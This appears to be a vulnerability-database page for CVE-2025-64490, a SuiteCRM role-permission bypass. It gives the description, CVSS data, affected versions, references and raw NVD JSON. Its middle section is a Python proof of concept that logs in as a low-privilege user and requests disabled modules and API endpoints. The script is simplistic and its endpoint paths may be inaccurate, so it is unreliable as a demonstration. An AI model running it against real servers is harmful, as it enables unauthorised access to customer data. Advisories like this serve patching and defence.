CVE-2025-64490

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 7.14.7 and prior, 8.0.0-beta.1 through 8.9.0 allow a low-privileged user with a restrictive role to view and create work items through the Resource Calendar and project screens, even when the related modules (Projects, Project Tasks, Tasks, Leads, Accounts, Meetings, Calls) are explicitly set to Disabled/None in Role Management. This indicates inconsistent ACL/RBAC enforcement across modules and views, resulting in unauthorized data exposure and modification. This issue is fixed in versions 7.14.8 and 8.9.1.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE

SuiteCRM < 7.14.8

SuiteCRM 7.14.7

SuiteCRM 8.0.0-beta.1 - 8.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64490 SuiteCRM ACL Bypass PoC
# This PoC demonstrates unauthorized access to disabled modules

import requests
from bs4 import BeautifulSoup
import re

TARGET_URL = "http://target-suitecrm.com"
USERNAME = "low_privilege_user"
PASSWORD = "user_password"

def login(session, target_url, username, password):
    """Authenticate to SuiteCRM and obtain session cookie"""
    login_url = f"{target_url}/index.php?action=Login&module=Users"
    response = session.get(login_url)
    
    # Extract CSRF token
    soup = BeautifulSoup(response.text, 'html.parser')
    csrf_token = soup.find('input', {'name': 'csrf_token'}) or \
                 soup.find('input', {'name': 'return_module'})
    
    login_data = {
        'user_name': username,
        'user_password': password,
        'action': 'Login',
        'module': 'Users'
    }
    if csrf_token:
        login_data['csrf_token'] = csrf_token.get('value', '')
    
    return session.post(login_url, data=login_data)

def exploit_calendar_access(session, target_url):
    """Access Resource Calendar despite disabled module permissions"""
    calendar_url = f"{target_url}/index.php?module=Calendar&action=index"
    response = session.get(calendar_url)
    
    if response.status_code == 200:
        print("[+] Successfully accessed Resource Calendar (should be disabled)")
        return response.text
    return None

def exploit_project_access(session, target_url):
    """Access Project module despite disabled permissions"""
    project_url = f"{target_url}/index.php?module=Project&action=index"
    response = session.get(project_url)
    
    if response.status_code == 200:
        print("[+] Successfully accessed Project module (should be disabled)")
        return response.text
    return None

def exploit_api_access(session, target_url):
    """Direct API access to restricted modules"""
    api_endpoints = [
        '/api/v8/modules/Project',
        '/api/v8/modules/ProjectTask',
        '/api/v8/modules/Tasks'
    ]
    
    results = {}
    for endpoint in api_endpoints:
        response = session.get(f"{target_url}{endpoint}")
        if response.status_code == 200:
            print(f"[+] API access successful: {endpoint}")
            results[endpoint] = response.json()
    return results

def main():
    session = requests.Session()
    
    # Step 1: Login with low-privilege account
    print("[*] Attempting login with low-privilege account...")
    login_response = login(session, TARGET_URL, USERNAME, PASSWORD)
    
    if 'error' not in login_response.url.lower():
        print("[+] Login successful")
        
        # Step 2: Exploit ACL bypass via Calendar
        print("[*] Testing Resource Calendar access...")
        exploit_calendar_access(session, TARGET_URL)
        
        # Step 3: Exploit ACL bypass via Project module
        print("[*] Testing Project module access...")
        exploit_project_access(session, TARGET_URL)
        
        # Step 4: Direct API exploitation
        print("[*] Testing direct API access...")
        exploit_api_access(session, TARGET_URL)
    else:
        print("[-] Login failed")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64490
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64490
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64490/
[4] VulDB https://vuldb.com/cve/CVE-2025-64490
[5] https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-jh8v-wqgj-hhc2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64490", "sourceIdentifier": "[email protected]", "published": "2025-11-08T01:15:38.830", "lastModified": "2025-11-25T17:32:46.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 7.14.7 and prior, 8.0.0-beta.1 through 8.9.0 allow a low-privileged user with a restrictive role to view and create work items through the Resource Calendar and project screens, even when the related modules (Projects, Project Tasks, Tasks, Leads, Accounts, Meetings, Calls) are explicitly set to Disabled/None in Role Management. This indicates inconsistent ACL/RBAC enforcement across modules and views, resulting in unauthorized data exposure and modification. This issue is fixed in versions 7.14.8 and 8.9.1."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con el cliente (CRM) de código abierto y lista para empresas. Las versiones 7.14.7 y anteriores, 8.0.0-beta.1 hasta la 8.9.0 permiten a un usuario con bajos privilegios y un rol restrictivo ver y crear elementos de trabajo a través del Calendario de Recursos y las pantallas de proyectos, incluso cuando los módulos relacionados (Proyectos, Tareas de Proyecto, Tareas, Clientes Potenciales, Cuentas, Reuniones, Llamadas) están explícitamente configurados como Deshabilitado/Ninguno en la Gestión de Roles. Esto indica una aplicación inconsistente de ACL/RBAC entre módulos y vistas, lo que resulta en exposición y modificación de datos no autorizadas. Este problema está solucionado en las versiones 7.14.8 y 8.9.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.14.8", "matchCriteriaId": "37968BEF-2577-4B8F-AE06-8C9DCEB9C84B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.1", "matchCriteriaId": "5DFDEB5D-4821-41F8-AEBB-38D394739DDE"}]}]}], "references": [{"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-jh8v-wqgj-hhc2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}